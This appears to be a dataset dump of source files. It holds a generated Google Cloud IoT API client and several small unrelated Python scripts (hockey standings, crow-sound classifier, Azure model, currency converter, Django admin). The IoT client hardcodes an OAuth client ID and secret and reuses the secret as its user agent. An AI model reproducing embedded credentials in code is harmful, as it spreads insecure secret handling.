# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.cloudiot.v1beta1 import cloudiot_v1beta1_messages as messages
class CloudiotV1beta1(base_api.BaseApiClient):
"""Generated client library for service cloudiot version v1beta1."""
MESSAGES_MODULE = messages
BASE_URL = u'https://cloudiot.googleapis.com/'
_PACKAGE = u'cloudiot'
_SCOPES = [u'https://www.googleapis.com/auth/cloud-platform', u'https://www.googleapis.com/auth/cloudiot']
_VERSION = u'v1beta1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_CLIENT_CLASS_NAME = u'CloudiotV1beta1'
_URL_VERSION = u'v1beta1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None):
"""Create a new cloudiot handle."""
url = url or self.BASE_URL
super(CloudiotV1beta1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers)
self.projects_locations_registries_devices_configVersions = self.ProjectsLocationsRegistriesDevicesConfigVersionsService(self)
self.projects_locations_registries_devices = self.ProjectsLocationsRegistriesDevicesService(self)
self.projects_locations_registries = self.ProjectsLocationsRegistriesService(self)
self.projects_locations = self.ProjectsLocationsService(self)
self.projects = self.ProjectsService(self)
class ProjectsLocationsRegistriesDevicesConfigVersionsService(base_api.BaseApiService):
"""Service class for the projects_locations_registries_devices_configVersions resource."""
_NAME = u'projects_locations_registries_devices_configVersions'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsRegistriesDevicesConfigVersionsService, self).__init__(client)
self._upload_configs = {
}
def List(self, request, global_params=None):
"""Lists the last few versions of the device configuration in descending.
order (i.e.: newest first).
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesConfigVersionsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDeviceConfigVersionsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}/configVersions',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.devices.configVersions.list',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'numVersions'],
relative_path=u'v1beta1/{+name}/configVersions',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesConfigVersionsListRequest',
response_type_name=u'ListDeviceConfigVersionsResponse',
supports_download=False,
)
class ProjectsLocationsRegistriesDevicesService(base_api.BaseApiService):
"""Service class for the projects_locations_registries_devices resource."""
_NAME = u'projects_locations_registries_devices'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsRegistriesDevicesService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
"""Creates a device in a device registry.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Device) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.devices.create',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[],
relative_path=u'v1beta1/{+parent}/devices',
request_field=u'device',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesCreateRequest',
response_type_name=u'Device',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes a device.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}',
http_method=u'DELETE',
method_id=u'cloudiot.projects.locations.registries.devices.delete',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesDeleteRequest',
response_type_name=u'Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Gets details about a device.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Device) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.devices.get',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesGetRequest',
response_type_name=u'Device',
supports_download=False,
)
def List(self, request, global_params=None):
"""List devices in a device registry.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDevicesResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.devices.list',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[u'deviceIds', u'deviceNumIds', u'fieldMask', u'pageSize', u'pageToken'],
relative_path=u'v1beta1/{+parent}/devices',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesListRequest',
response_type_name=u'ListDevicesResponse',
supports_download=False,
)
def ModifyCloudToDeviceConfig(self, request, global_params=None):
"""Modifies the configuration for the device, which is eventually sent from.
the Cloud IoT servers. Returns the modified configuration version and its
meta-data.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesModifyCloudToDeviceConfigRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceConfig) The response message.
"""
config = self.GetMethodConfig('ModifyCloudToDeviceConfig')
return self._RunMethod(
config, request, global_params=global_params)
ModifyCloudToDeviceConfig.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}:modifyCloudToDeviceConfig',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.devices.modifyCloudToDeviceConfig',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}:modifyCloudToDeviceConfig',
request_field=u'modifyCloudToDeviceConfigRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesModifyCloudToDeviceConfigRequest',
response_type_name=u'DeviceConfig',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a device.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Device) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}',
http_method=u'PATCH',
method_id=u'cloudiot.projects.locations.registries.devices.patch',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'updateMask'],
relative_path=u'v1beta1/{+name}',
request_field=u'device',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesPatchRequest',
response_type_name=u'Device',
supports_download=False,
)
class ProjectsLocationsRegistriesService(base_api.BaseApiService):
"""Service class for the projects_locations_registries resource."""
_NAME = u'projects_locations_registries'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsRegistriesService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
"""Creates a device registry that contains devices.
Args:
request: (CloudiotProjectsLocationsRegistriesCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceRegistry) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.create',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[],
relative_path=u'v1beta1/{+parent}/registries',
request_field=u'deviceRegistry',
request_type_name=u'CloudiotProjectsLocationsRegistriesCreateRequest',
response_type_name=u'DeviceRegistry',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes a device registry configuration.
Args:
request: (CloudiotProjectsLocationsRegistriesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}',
http_method=u'DELETE',
method_id=u'cloudiot.projects.locations.registries.delete',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDeleteRequest',
response_type_name=u'Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Gets a device registry configuration.
Args:
request: (CloudiotProjectsLocationsRegistriesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceRegistry) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.get',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesGetRequest',
response_type_name=u'DeviceRegistry',
supports_download=False,
)
def GetIamPolicy(self, request, global_params=None):
"""Gets the access control policy for a resource.
Returns an empty policy if the resource exists and does not have a policy
set.
Args:
request: (CloudiotProjectsLocationsRegistriesGetIamPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Policy) The response message.
"""
config = self.GetMethodConfig('GetIamPolicy')
return self._RunMethod(
config, request, global_params=global_params)
GetIamPolicy.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}:getIamPolicy',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.getIamPolicy',
ordered_params=[u'resource'],
path_params=[u'resource'],
query_params=[],
relative_path=u'v1beta1/{+resource}:getIamPolicy',
request_field=u'getIamPolicyRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesGetIamPolicyRequest',
response_type_name=u'Policy',
supports_download=False,
)
def List(self, request, global_params=None):
"""Lists device registries.
Args:
request: (CloudiotProjectsLocationsRegistriesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDeviceRegistriesResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.list',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[u'pageSize', u'pageToken'],
relative_path=u'v1beta1/{+parent}/registries',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesListRequest',
response_type_name=u'ListDeviceRegistriesResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a device registry configuration.
Args:
request: (CloudiotProjectsLocationsRegistriesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceRegistry) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}',
http_method=u'PATCH',
method_id=u'cloudiot.projects.locations.registries.patch',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'updateMask'],
relative_path=u'v1beta1/{+name}',
request_field=u'deviceRegistry',
request_type_name=u'CloudiotProjectsLocationsRegistriesPatchRequest',
response_type_name=u'DeviceRegistry',
supports_download=False,
)
def SetIamPolicy(self, request, global_params=None):
"""Sets the access control policy on the specified resource. Replaces any.
existing policy.
Args:
request: (CloudiotProjectsLocationsRegistriesSetIamPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Policy) The response message.
"""
config = self.GetMethodConfig('SetIamPolicy')
return self._RunMethod(
config, request, global_params=global_params)
SetIamPolicy.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}:setIamPolicy',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.setIamPolicy',
ordered_params=[u'resource'],
path_params=[u'resource'],
query_params=[],
relative_path=u'v1beta1/{+resource}:setIamPolicy',
request_field=u'setIamPolicyRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesSetIamPolicyRequest',
response_type_name=u'Policy',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
If the resource does not exist, this will return an empty set of
permissions, not a NOT_FOUND error.
Args:
request: (CloudiotProjectsLocationsRegistriesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestIamPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}:testIamPermissions',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.testIamPermissions',
ordered_params=[u'resource'],
path_params=[u'resource'],
query_params=[],
relative_path=u'v1beta1/{+resource}:testIamPermissions',
request_field=u'testIamPermissionsRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesTestIamPermissionsRequest',
response_type_name=u'TestIamPermissionsResponse',
supports_download=False,
)
class ProjectsLocationsService(base_api.BaseApiService):
"""Service class for the projects_locations resource."""
_NAME = u'projects_locations'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsService, self).__init__(client)
self._upload_configs = {
}
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = u'projects'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsService, self).__init__(client)
self._upload_configs = {
}
| [
"[email protected]"
] | |
adce83a22777b2ebe8fe30f555671f0d10599045 | 580a43c9bc8cc5cd5db745155e0721b5ba1664f6 | /S3-Notifications-Lambda/output.py | 8df38b8094739a3b3654a3327667dd092c71eb2e | [
"Apache-2.0"
] | permissive | Jardo72/AWS-Sandbox | e10e750a955701cb341b4133544f9e081378f37f | b0402295e9097027c12b1954df967a0ac4d5163d | refs/heads/master | 2023-07-08T21:02:30.360536 | 2023-06-30T09:07:23 | 2023-06-30T09:07:23 | 216,329,685 | 1 | 1 | Apache-2.0 | 2023-05-23T04:57:47 | 2019-10-20T08:21:58 | HCL | UTF-8 | Python | false | false | 1,983 | py | #
# Copyright 2021 Jaroslav Chmurny
#
# This file is part of AWS Sandbox.
#
# AWS Sandbox is free software developed for educational purposes. It
# is licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicationlicationlicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Sequence
from model import StandingsEntry
def _column_headings() -> str:
return ' GP RW OW OL RL GF:GA PTS\n'
def _standings_entries(entries: Sequence[StandingsEntry]) -> str:
result = ''
for index, single_entry in enumerate(entries):
rank = index + 1
result += f'{rank:2}.{single_entry.team} '
result += f'{single_entry.overall_game_count:2d} '
result += f'{single_entry.regulation_win_count:2d} '
result += f'{single_entry.overtime_win_count:2d} '
result += f'{single_entry.overtime_loss_count:2d} '
result += f'{single_entry.regulation_loss_count:2d} '
result += f'{single_entry.goals_for:2d}:'
result += f'{single_entry.goals_against:2d} '
result += f'{single_entry.points:3d}\n'
return result
def _legend() -> str:
return """
Legend
GP .... Games Played
RW .... Regulation Wins
OW .... Overtime + Shootout Wins
OL .... Overtime + Shootout Losses
RL .... Regulation Losses
GF .... Goals For
GF .... Goals Against
PTS ... Points
"""
def print_standings(entries: Sequence[StandingsEntry]) -> str:
return _column_headings() + _standings_entries(entries) + _legend()
| [
"[email protected]"
] | |
50509f1fcaee6a8db649657d24ee5a29044b19e6 | 6932a9ae700a623f16a3aef417d0598cf6d4f389 | /karasu_speak.py | c8c028b30786e6c5b67abc979a0d40f60e63f06a | [
"MIT"
] | permissive | MuAuan/hirakegoma | 9f1a252d913749a2c16ae5bd7a8870550048d26d | 861879af1016c25b7a14bcabe543bfba47fd57f3 | refs/heads/master | 2020-04-27T20:12:25.315594 | 2019-03-24T12:38:30 | 2019-03-24T12:38:30 | 174,649,241 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,935 | py | # -*- coding: utf-8 -*-
import cv2
import pyaudio
import sys
import time
import wave
import pydub
from pydub import AudioSegment
import moviepy.editor as mp
import datetime
import os
from vgg16_like import model_family_cnn
from keras.preprocessing import image
import matplotlib.pyplot as plt
import keras
import numpy as np
def prediction(imgSrc,model):
#np.random.seed(1337) # for reproducibility
img_rows,img_cols=128, 128
img = np.array(imgSrc)
img = img.reshape(1, img_rows,img_cols,3)
img = img.astype('float32')
img /= 255
t0=time.time()
y_pred = model.predict(img)
return y_pred
def karasu_responder(model,path,img_rows,img_cols):
imgSrc=[]
#for j in range(0,100000,1):
# j += 1
imgSrc = image.load_img(path, target_size=(img_rows,img_cols))
#plt.imshow(imgSrc)
#plt.pause(1)
#plt.close()
pred = prediction(imgSrc,model)
#print(pred[0])
if pred[0][0]>=0.5:
filename = "karasu-miyama_out1.wav"
print("angry")
elif pred[0][1]>=0.5:
#filename = "karasu_kero_out3.wav"
filename = "karasu-normal_out1.wav"
print("normal")
elif pred[0][2]>=0.5:
#filename = "karasu_kero_out1.wav"
filename = "karasu-others_out1.wav" #karasu-hageshii_out.wav
print("others")
return filename
num_classes = 3
img_rows,img_cols=128, 128
input_shape = (img_rows,img_cols,3)
model = model_family_cnn(input_shape, num_classes = num_classes)
# load the weights from the last epoch
model.load_weights('params_karasu-0angry-1normal-2others.hdf5', by_name=True)
print('Model loaded.')
path = "./out_test/figure.jpg"
img_rows,img_cols=128,128
s=0
while True:
if os.path.exists(path)==True:
s += 1
for j in range(0,50000000,1):
j += 1
"""
if s%3 == 0:
path="./out_test/figure_angry.jpg"
elif s%3 == 1:
path="./out_test/figure_normal.jpg"
else:
path="./out_test/figure_others.jpg"
"""
filename=karasu_responder(model,path,img_rows,img_cols)
wf = wave.open(filename, "rb")
# チャンク数を指定
CHUNK1 = 1024
#filename = "hirakegoma.wav"
wf = wave.open(filename, "rb")
# PyAudioのインスタンスを生成
p1 = pyaudio.PyAudio()
# Streamを生成
stream1 = p1.open(format=p1.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
# データを1度に1024個読み取る
input1 = wf.readframes(CHUNK1)
# 実行
while stream1.is_active():
output = stream1.write(input1)
input1 = wf.readframes(CHUNK1)
if input1==b'':
os.remove(path)
break
| [
"[email protected]"
] | |
34179ff136b9b68223fd42cb9f5fbe54e95a88de | af0dcf80a36da4ac6894dc517ad1870f702c3122 | /azure-mgmt-web/azure/mgmt/web/models/csm_publishing_profile_options.py | 99b9542ab7d50b0a1d29b9d31f8743561ff5afa3 | [
"Apache-2.0"
] | permissive | FlavioAlexander/azure-sdk-for-python | 4c6151ca17886f9e4d47e1ccc469859abdedca5a | 8c7416749f9a5697e0311bc9af8fe5c0d524ca03 | refs/heads/master | 2021-01-24T02:34:37.194767 | 2016-07-03T23:47:23 | 2016-07-03T23:47:23 | 62,738,173 | 0 | 1 | null | 2016-07-06T16:54:12 | 2016-07-06T16:54:10 | null | UTF-8 | Python | false | false | 1,346 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft and contributors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CsmPublishingProfileOptions(Model):
"""Publishing options for requested profile.
:param format: Name of the format. Valid values are:
FileZilla3
WebDeploy -- default
Ftp
:type format: str
"""
_attribute_map = {
'format': {'key': 'format', 'type': 'str'},
}
def __init__(self, format=None):
self.format = format
| [
"[email protected]"
] | |
b1df1327d79b654f1819f0289b69a4ab8c88928c | ee052bcf1a0836156c5d97a6a0aa4ed45dc19716 | /currencyConverter.py | 8d73a79f044e27d75dfad40f3bd5cdf6c483e90e | [] | no_license | JATIN-RATHI/CurrencyConverter | 194f88166cece1f30a97cf0bc1ef6f4884d3c5a1 | ca15cdb3ab6f87180460d8bf572a7816d7928015 | refs/heads/master | 2022-11-21T03:04:57.031541 | 2020-07-23T09:43:43 | 2020-07-23T09:43:43 | 281,911,713 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,952 | py | # Link :---> https://www.x-rates.com/table/?from=INR&amount=1
if __name__ == '__main__':
with open('currencyDATA') as f:
lines = f.readlines()
dict = {}
for line in lines:
parsed = line.split("\t")
dict[parsed[0]] = parsed[1]
print("Choose any one to convert Indian currency into : \n1: Argentine Peso\n2: Australian Dollar\n3: Bahraini "
"Dinar\n4: Botswana Pula\n5: Brazilian Real\n6: British Pound\n7: Bruneian Dollar\n8: Bulgarian Lev\n9: "
"Canadian Dolla\n10: Chilean Peso\n11: Chinese Yuan Renminbi\n12: Colombian Peso\n13: Croatian Kuna\n14: "
"Czech Koruna\n15: Danish Krone\n16: Emirati Dirham\n17: Euro\n18: Hong Kong Dollar\n19: Hungarian "
"Forint\n20: Icelandic Krona\n21: Indonesian Rupiah\n22: Iranian Rial\n23: Israeli Shekel\n24: Japanese "
"Yen\n25: Kazakhstani Tenge\n26: Kuwaiti Dinar\n27: Libyan Dinar\n28: Malaysian Ringgit\n29: Mauritian "
"Rupee\n30: Mexican Peso\n31: Nepalese Rupee\n32: New Zealand Dollar\n33: Norwegian Krone\n34: Omani "
"Rial\n35: Pakistani Rupee\n36: Philippine Peso\n37: Polish Zloty\n38: Qatari Riyal\n39: Romanian New "
"Leu\n40: Russian Ruble\n41: Saudi Arabian Riyal\n42: Singapore Dollar\n43: South African Rand \n44: "
"South Korean Won\n45: Sri Lankan Rupee\n46: Swedish Krona\n47: Swiss Franc\n48: Taiwan New Dollar\n49: "
"Thai Baht\n50: Trinidadian Dollar\n51: Turkish Lira\n52: US Dollar\n53: Venezuelan Bolivar")
choose = int(input("Enter your choice : ")) - 1
name = dict.keys()
key_list = list(name)
currency_name = key_list[choose]
amt = dict.values()
value_list = list(amt)
currency_value = value_list[choose]
amount = int(input("Enter amount to be converted: "))
total = amount * float(currency_value)
print(f"{amount} Indian Rupee = {total} {currency_name} ")
| [
"[email protected]"
] | |
c4be81c83c88067b9cf207fdeb2ab275f44e2c08 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /F4iemEeFfsaFoMpAF_4.py | 786cba909da3a937ac21071a5cc1d90693d4e336 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 776 | py | """
This is a list of single characters with an unwanted character at the end:
["H", "e", "l", "l", "o", "!", "\0"]
You could also just type "Hello!" when initializing a variable, creating the
string "Hello!"
Create a function that will return a string by combining the given character
list, not including the unwanted final character.
### Examples
cpp_txt(["H", "i", "!", "\0"]) ➞ "Hi!"
cpp_txt(["H", "e", "l", "l", "o", "!", "\0"]) ➞ "Hello!"
cpp_txt(["J", "A", "V", "a", "\0"]) ➞ "JAVa"
### Notes
This is a translation of a C++ challenge and is trivial in Python, but perhaps
it will be helpful to someone out there. (No challenge is trivial until you
know how to solve it :)
"""
def cpp_txt(lst):
return ''.join(lst[:-1])
| [
"[email protected]"
] | |
6068e0dfbaa8b3e02df630a1f8f2d8551b444403 | 2eaecdb1ed42170463993b8b2285296c5ef2231d | /apps/ciudad/admin.py | d7e080b95887458bf100d3a8e00e6edfdc8c6041 | [] | no_license | ivanfdaza/tribunaleclesiasticoIIS | 9639fc66a2c99baa45b8276f4a1e035bdf294e2e | acb164ab8464b71d0461acf03bdd5e3386b57893 | refs/heads/master | 2022-11-21T10:32:14.925326 | 2020-07-23T16:21:26 | 2020-07-23T16:21:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | from django.contrib import admin
# Register your models here.
from apps.ciudad.models import Ciudad, Departamento
admin.site.register(Ciudad)
admin.site.register(Departamento) | [
"[email protected]"
] |
Subsets and Splits